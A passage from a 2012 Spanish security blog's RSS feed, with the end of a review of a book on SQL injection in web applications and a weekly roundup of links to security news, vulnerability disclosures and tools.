&lt;b&gt;De todas las técnicas&lt;/b&gt; que se van exponiendo se muestran &lt;b&gt;scripts de ejemplo&lt;/b&gt; para que el lector haga su propio laboratorio y las pruebas que quiera, y a partir de ahí, se describe &lt;b&gt;como se detecta, analiza y explota la vulnerabilidad&lt;/b&gt;. El resultado es realmente práctico, ya que si sigues los pasos es &lt;b&gt;prácticamente imposible que no lo entiendas&lt;/b&gt; a la perfección. Eso sí, hubiera estado bien que las páginas de prueba se pudieran descargar desde alguna web, ya que tener que "picarlas" desde el libro es un poco tedioso.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Además del detalle técnico, también se habla de herramientas que automatizan el proceso, describiendo su&amp;nbsp;funcionamiento&amp;nbsp;y sus características, ¡y se han acordado de &lt;a href="http://code.google.com/p/bsqlbf-v2/"&gt;bfsql&lt;/a&gt;!, que por cierto, otra persona ha continuado desarrollando en la &lt;a href="http://code.google.com/p/bsqlbf-v2/"&gt;v2&lt;/a&gt;.&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-ztjG93bM6hU/T5zzQx1hKSI/AAAAAAAAG7k/UI-H_deNFbY/s1600/bfsql.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="239" src="http://1.bp.blogspot.com/-ztjG93bM6hU/T5zzQx1hKSI/AAAAAAAAG7k/UI-H_deNFbY/s320/bfsql.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
El libro &lt;b&gt;cuesta 20€&lt;/b&gt; &amp;nbsp;y hay que solicitarlo en la página web de la editora: &lt;a href="http://www.informatica64.com/libros.aspx?id=hwsql"&gt;Informatica64&lt;/a&gt;, la futura O'Reilly.&lt;br /&gt;
&lt;br /&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5399811056563385935-605382927971494285?l=www.securitybydefault.com' alt='' /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/SecurityByDefault/~4/g9YRDwpW_Io" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/SecurityByDefault/~3/g9YRDwpW_Io/libro-hacking-de-aplicaciones-web-sql.html</link><author>noreply@blogger.com (Alejandro Ramos)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/-x22v8nW091s/T5zxcXVswSI/AAAAAAAAG7c/LBDasKsHzMQ/s72-c/webhacking.png" height="72" width="72" /><thr:total>2</thr:total><feedburner:origLink>http://www.securitybydefault.com/2012/04/libro-hacking-de-aplicaciones-web-sql.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5399811056563385935.post-8132437300646922261</guid><pubDate>Sun, 29 Apr 2012 07:30:00 +0000</pubDate><atom:updated>2012-04-29T09:30:01.529+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">secmana</category><title>Enlaces de la SECmana - 121</title><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/_fWA7DVpD2eo/TG6clsxg-qI/AAAAAAAAAek/nE1WBc8GrT0/s1600/informe-secmanal-banner.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"&gt;&lt;img border="0" height="88" src="http://3.bp.blogspot.com/_fWA7DVpD2eo/TG6clsxg-qI/AAAAAAAAAek/nE1WBc8GrT0/s1600/informe-secmanal-banner.jpg" width="399" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;/div&gt;
&lt;ul&gt;
&lt;li style="text-align: justify;"&gt;&lt;b&gt;&lt;a href="http://code.google.com/p/webgoat/"&gt;Nueva versión de WebGoat 5.4&lt;/a&gt;&lt;/b&gt;, la aplicación web J2EE con vulnerabilidades para realizar pruebas de seguridad sobre ella, perteneciente a OWASP.&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;&lt;a href="http://www.nilsjuenemann.de/"&gt;Nils&amp;nbsp;Juenemann&lt;/a&gt;, investigador y contribuidor de vulnerabilidades para Google+, &lt;a href="http://www.nilsjuenemann.de/2012/04/ethiopia-gets-new-school-thanks-to-xss.html"&gt;explica en su blog&lt;/a&gt; como ha conseguido donar todo lo obtenido del&amp;nbsp;&lt;i&gt;Google Vulnerability Reward Program&lt;/i&gt; tras reportar un &lt;i&gt;Cross-Site Scripting persistente&lt;/i&gt; y así &lt;a href="http://www.betterplace.org/en/projects/2001-school-project-welkite-i-in-ethiopia-east-africa"&gt;apoyar la construcción de un nuevo colegio en Etiopía&lt;/a&gt;.&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;&lt;a href="http://pastebin.com/rBu4jDm8"&gt;Cómo obtener la dirección IP de un contacto de Skype&lt;/a&gt;, con un poco de Perl y una versión parcheada del cliente.&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Ya disponible el &lt;a href="http://securitybloggersummit.com/?p=587"&gt;video del streaming que emitimos en el Security Blogger Summit 2012&lt;/a&gt; del pasado 19 de abril, organizado por Panda Security.&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;&lt;a href="http://arstechnica.com/business/news/2012/04/backdoor-in-mission-critical-hardware-threatens-power-traffic-control-systems.ars"&gt;Polémica tras descubrir una puerta trasera&lt;/a&gt; muy accesible desde Internet en un equipamiento hardware en el que se ejecuta el &lt;b&gt;sistema operativo Rugged&lt;/b&gt;, que actúa como los switches y hubs que conectan los controladores de lógica programable a las redes de ordenadores utilizadas para su envío de comandos. &lt;a href="http://lists.grok.org.uk/pipermail/full-disclosure/2012-April/086652.html"&gt;Aquí el post en Full-Disclosure&lt;/a&gt; que empezó todo.&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;&lt;a href="http://blog.spiderlabs.com/2012/04/pwning-a-spammers-keylogger.html"&gt;Genial post titulado "&lt;i&gt;Pwning a Spammer's Keylogger&lt;/i&gt;" en el blog de Spiderlabs escrito por&amp;nbsp;Rodel Mendrez&lt;/a&gt; en el que cuenta sus andanzas analizando un malware que resultó ser un keylogger, y del que pudo comprometer el servidor que recopilaba todas las capturas.&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;En el blog de Taddong anuncian el comienzo del&amp;nbsp;&lt;a href="http://blog.taddong.com/2012/04/owasp-zap-smartcard-project.html"&gt;OWASP ZAP SmartCard Project&lt;/a&gt;, proyecto que pretende incluir soporte de &lt;a href="https://code.google.com/p/zaproxy/wiki/SmartCards"&gt;diferentes métodos de autenticación e identificación digital de diferentes países&lt;/a&gt; (como el DNIe para España) dentro de la herramienta ZAP, y así permitir la auditoría de las aplicaciones web que hagan uso de dichos mecanismos.&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;&lt;a href="http://www.hacktimes.com/mcafee_ePO/"&gt;En HackTimes publican una colaboración&lt;/a&gt;&amp;nbsp;de&amp;nbsp;Óscar de Pedro en la que se cuenta una &lt;b&gt;fuga de datos reportada a McAfee, que permitía a un usuario, aprovechando una vulnerabilidad en la ePO&lt;/b&gt;, &lt;i&gt;con únicamente permisos para poder acceder a la ePO puede ver paneles de reporte donde obtener diversa información de otros equipos gestionados y de su actividad en lo que se refiere a alertas detectadas por la propia ePO, malware encontrado, número de sistemas y datos de los mismos como, por ejemplo, Sistema Operativo, dirección IP, nombre del usuario administrador, etc. &lt;/i&gt;&lt;a href="https://kc.mcafee.com/corporate/index?page=content&amp;amp;id=SB10025"&gt;En este enlace&lt;/a&gt; se puede ver el boletín de seguridad de McAfee en el que se menciona esta vulnerabilidad.&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;&lt;a href="http://www.wired.com/threatlevel/2012/04/vmware-source-code-leaked"&gt;Se filtra código fuente del producto ESX de VMWare&lt;/a&gt;, de entre 2003 y 2004, por parte de un hacker que dice haberlo obtenido tras comprometer una firma china, CEIE, que trabaja con el ejército chino. &lt;a href="http://blogs.vmware.com/security/2012/04/vmware-security-note.html"&gt;VMWare declara&lt;/a&gt; que como política de empresa, se suele compartir ciertas partes del código con diferentes empresas externas (algo que también hace Microsoft, por ejemplo...). Y que por tanto, existen otras partes que se podrían obtener de otros lugares.&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;&lt;a href="http://www.vulnerability-lab.com/get_content.php?id=529"&gt;Grave vulnerabilidad en el sistema de recuperación de contraseñas de Microsoft MSN Hotmail,&lt;/a&gt; que permitía reiniciar la contraseña con valores elegidos por un atacante.&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5399811056563385935-8132437300646922261?l=www.securitybydefault.com' alt='' /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/SecurityByDefault/~4/jRfzcgp6LJ8" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/SecurityByDefault/~3/jRfzcgp6LJ8/enlaces-de-la-secmana-121.html</link><author>noreply@blogger.com (José A. Guasch)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/_fWA7DVpD2eo/TG6clsxg-qI/AAAAAAAAAek/nE1WBc8GrT0/s72-c/informe-secmanal-banner.jpg" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.securitybydefault.com/2012/04/enlaces-de-la-secmana-121.html</feedburner:origLink></item></channel></rss>

